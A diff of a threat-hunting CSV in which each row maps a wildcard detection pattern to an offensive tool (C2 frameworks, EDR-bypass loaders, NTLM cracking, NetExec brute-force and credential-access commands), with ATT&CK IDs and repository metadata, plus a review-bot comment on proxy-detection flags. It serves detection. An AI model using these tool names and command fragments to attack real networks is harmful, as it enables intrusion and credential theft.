T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","303","52","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" "*ntlmv1.py --ntlmv1 *::*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" -"*ntlmv1.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*ntlmv1_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*ntlmv1.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*ntlmv1_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network 
Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*ntlmv1-multi --ntlmv1 *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*NtoskrnlOffsets.csv*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" -"*NtRemoteLoad-main*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","173","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" -"*ntrights.exe*","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","7","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*NtUserMNDragOverExploit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*NtRemoteLoad-main*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*ntrights.exe*","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","7","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*NtUserMNDragOverExploit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*NtWa1tF0rS1ngle0bj3ct Executed*","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","0","N/A","9","3","278","42","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*Nuages*/Implants*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*nuages.clearImplants *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" 
@@ -14245,26 +14408,28 @@ "*Nuke_Privileges /Process:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" "*NUL0x4C/APCLdr*","offensive_tool_keyword","APCLdr","APCLdr: Payload Loader With Evasion Features","T1027 - T1055 - T1055.002 - T1055.003 - T1070 - T1070.004 - T1071 - T1106 - T1574.001","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/NUL0x4C/APCLdr","1","1","N/A","N/A","3","285","51","2023-01-22T04:24:33Z","2023-01-21T18:09:36Z" "*NUL0x4C/AtomLdr*","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","543","78","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" -"*null-byte.com/bypass-amsi*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*NullSessionScanner.*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://github.com/vletoux/pingcastle","1","1","N/A","N/A","10","1859","249","2023-09-18T17:29:51Z","2018-08-31T17:42:48Z" -"*nxc ftp *bruteforce*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a 
post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*nxc http *--port*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*nxc ldap * --admin-count*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*nxc ldap * --trusted-for-delegation*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*nxc mssql *--get-file*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*nxc mssql 
*--local-auth*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*nxc ssh *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*nxc winrm * -X *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*nysm.skel.h*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","30","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" -"*nysm-master.zip*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","1","N/A","10","1","30","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*null-byte.com/bypass-amsi*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - 
T1059.001 - T1562.001","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"*NullSessionScanner.*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://github.com/vletoux/pingcastle","1","1","N/A","N/A","10","1860","249","2023-09-18T17:29:51Z","2018-08-31T17:42:48Z" +"*nxc ftp *bruteforce*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc http *--port*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc ldap * --admin-count*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc ldap * --trusted-for-delegation*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of 
large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc mssql *--get-file*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc mssql *--local-auth*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc ssh *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc winrm * -X *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxc*nxcdb.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps 
automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nxcdb-zipapp-*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*nysm.skel.h*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*nysm-master.zip*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","1","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" "*nyxgeek*","offensive_tool_keyword","Github Username","github user hosting exploitation and recon tools","N/A","N/A","N/A","N/A","Information Gathering","https://github.com/nyxgeek","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nyxgeek/lyncsmash*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*nyxgeek/ntlmscan*","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - 
T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","303","52","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" -"*nyxgeek/teamstracker*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","46","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" -"*-o kitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*nyxgeek/teamstracker*","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","47","3","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" +"*-o kitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*o_getprivs*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*o365-Attack-Toolkit*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" -"*o365-attack-toolkit*","offensive_tool_keyword","o365-attack-toolkit","A toolkit to attack Office365","T1110 - T1114 - T1119 - T1197 - T1087.002","TA0001 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/o365-attack-toolkit","1","1","N/A","10","10","954","218","2020-11-06T12:09:26Z","2019-07-22T10:39:46Z" +"*o365-attack-toolkit*","offensive_tool_keyword","o365-attack-toolkit","A toolkit to attack Office365","T1110 - T1114 - T1119 - T1197 - T1087.002","TA0001 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/o365-attack-toolkit","1","1","N/A","10","10","955","218","2020-11-06T12:09:26Z","2019-07-22T10:39:46Z" "*o365creeper.git*","offensive_tool_keyword","o365creeper","Python script 
that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Network Exploitation tools","https://github.com/LMGsec/o365creeper","1","1","N/A","N/A","3","265","57","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z" "*o365creeper.py*","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Network Exploitation tools","https://github.com/LMGsec/o365creeper","1","1","N/A","N/A","3","265","57","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z" "*o365creeper-master*","offensive_tool_keyword","o365creeper","Python script that performs email address validation against Office 365 without submitting login attempts","T1592.002 - T1596","TA0007","N/A","N/A","Network Exploitation tools","https://github.com/LMGsec/o365creeper","1","1","N/A","N/A","3","265","57","2020-08-07T17:40:41Z","2019-07-12T21:32:05Z" 
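Review bot: The added `*nxcdb-zipapp-*` row sets `metadata_enable_proxy_detection` to `"0"`, while the other archive-style keywords in this hunk (`*nysm-master.zip*`, `*o365creeper-master*`) set it to `"1"`. If the keyword is meant to match a downloadable release artifact name, which the `-zipapp-` suffix suggests but the hunk does not show, the string would also appear in download URLs, and proxy-log matching would miss it with the flag off. Consider `"1","1"` for that row, as the sibling `*nxc*nxcdb.py*` row added alongside it already has. The `metadata_comment` column is `N/A` on both new rows; a short note on where each string is expected (file name, command line, URL) would help whoever tunes false positives.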
@@ -14276,15 +14441,15 @@ "*o365recon-master*","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","1","N/A","N/A","7","617","94","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*oab-parse.py*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*oaburl.py */*:*@* -e *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*obfuscate.py grunt*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*obfuscate.py grunt*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*Obfuscate.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*obfuscate/shellter*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*obfuscate_cmdlet*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*obfuscate_cmdlet*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "*obfuscate_command*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 